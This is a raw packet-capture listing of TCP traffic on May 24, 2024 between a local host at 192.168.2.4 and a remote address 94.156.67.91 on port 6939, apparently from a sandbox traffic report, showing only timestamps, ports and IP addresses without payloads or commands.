May 24, 2024 05:10:02.802728891 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.807676077 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807683945 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807691097 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807698011 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807704926 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807712078 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807718992 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807725906 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807733059 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807739973 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807746887 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807754040 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807761908 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.807934046 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.807934046 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.807934046 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.812477112 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.812572956 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.817262888 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.817270994 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.817272902 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.817279100 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.817281008 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.817282915 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.817289114 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.817296028 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.817297935 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.817303896 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.817310095 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.817487955 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.817619085 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.822393894 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.822402954 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.822408915 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.822416067 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.822422981 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.822429895 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.822437048 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.822657108 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.822658062 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.827692032 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.827701092 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.827707052 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.827713966 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.827722073 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.827728987 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.827735901 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.827743053 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.827749968 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.827756882 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.827764034 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.827770948 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.827888966 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.832505941 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832513094 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832520008 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832526922 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832534075 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832540989 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832547903 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832555056 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832561970 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832567930 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832576036 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832581997 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832588911 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832596064 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832602978 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832609892 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832617044 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.832623959 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.837261915 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.837270021 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.837275982 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.883363962 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.883373022 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.173758984 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.221604109 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:03.789982080 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:03.789982080 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:03.789982080 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:03.790107012 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:03.794958115 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.799670935 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.799679995 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.799685955 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.799693108 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.799700022 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.799706936 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.799715042 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.799721003 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.799729109 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.799736023 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.799742937 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:03.804414034 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:04.037986040 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:04.080883026 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:04.538846970 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:04.538846970 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:04.538846970 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:04.538995981 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:04.538995981 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:04.539033890 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:04.539100885 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:04.846539974 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:05.418068886 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419203043 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419212103 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419219017 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419224977 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419233084 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419239044 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419246912 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419254065 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419256926 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419264078 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419270992 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419277906 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419285059 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419287920 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419294119 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419301033 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419307947 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419315100 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419322014 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419328928 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419337034 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.419446945 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:05.419447899 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:05.419568062 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:05.422955990 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.422966003 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.422971964 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.422980070 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.429169893 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.429212093 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.429219007 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.429225922 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.429233074 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.429239035 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.429245949 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.429253101 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.429260015 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.429266930 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.429274082 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.429272890 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:05.479295969 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.479305029 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.479311943 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.479319096 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.479326010 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.479331970 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.484019041 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.660075903 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:05.706043005 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:06.280592918 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:06.280592918 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:06.280592918 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:06.280719995 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:06.280719995 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:06.280769110 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:06.285691977 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.286029100 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:06.290411949 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290421009 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290427923 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290433884 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290441990 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290448904 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290455103 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290462971 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290469885 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290477037 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290493011 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290501118 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290508032 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.290513992 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297024012 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297032118 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297038078 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297044992 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297051907 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297058105 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297065020 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297072887 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297080040 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297086954 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297094107 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297101021 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.297107935 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.347233057 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.468662024 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:06.518532038 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:07.471712112 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:07.477339029 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:07.477412939 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:07.482378006 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:07.768392086 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:07.768796921 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:07.768796921 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:07.773231030 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:07.773314953 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:07.821341991 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:07.871308088 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:07.871318102 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:12.784406900 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:12.789674997 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:12.791018009 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:12.791100979 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:12.845738888 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:13.401057005 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:13.405802965 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:13.405982018 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:13.412616014 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:13.478724957 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:13.651427984 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:13.653283119 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:13.658940077 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:13.824237108 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:13.826839924 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:13.831835032 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:13.831995010 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:13.836940050 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.112031937 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.114469051 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.119615078 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.119801044 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.124790907 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.399795055 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.402705908 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.402865887 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.403985023 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.406642914 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.406809092 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.409251928 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.409262896 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.409461021 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.414427042 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.414437056 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.414510012 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.414947987 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.417042017 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.417104006 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.419150114 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.419161081 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.419203997 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.421072960 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.421083927 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.421133995 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.424967051 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.424978018 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.424985886 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.425040007 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.471599102 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.472776890 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.473081112 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.491591930 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.492218018 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.492312908 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.493837118 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.495533943 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.495548010 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.495558023 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.495609045 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.495609045 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.498863935 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.498878002 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.498922110 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.502105951 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.502119064 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.502177000 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.505386114 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.505398989 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.505408049 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.505418062 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.505451918 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.505517006 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.508008957 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.508021116 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.508028984 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.508064032 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.510632038 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.510643005 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.510685921 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.512065887 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.512077093 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.512124062 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.514708996 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.514720917 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.514729023 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.514758110 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.514792919 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.517018080 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.517028093 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.517070055 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.517472029 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.519648075 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.519695997 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.522197008 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.522207022 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.522248983 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:14.567357063 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:14.612231970 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:16.774054050 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:16.779206991 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:16.779326916 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:16.784346104 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.062146902 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.062165976 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.062577963 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.062908888 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.066596985 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.066611052 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.066886902 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.067372084 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.067531109 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.068274021 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.068284988 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.068334103 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.069931030 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.069942951 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.069984913 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.070571899 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.073904037 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.073915005 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.073921919 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.073930979 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.073962927 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.073997974 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.074887991 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.074898005 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.075067043 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.077270985 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.077281952 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.077327013 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.080230951 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.080241919 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.080394030 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.080996990 CEST	6939	49740	94.156.67.91	192.168.2.4
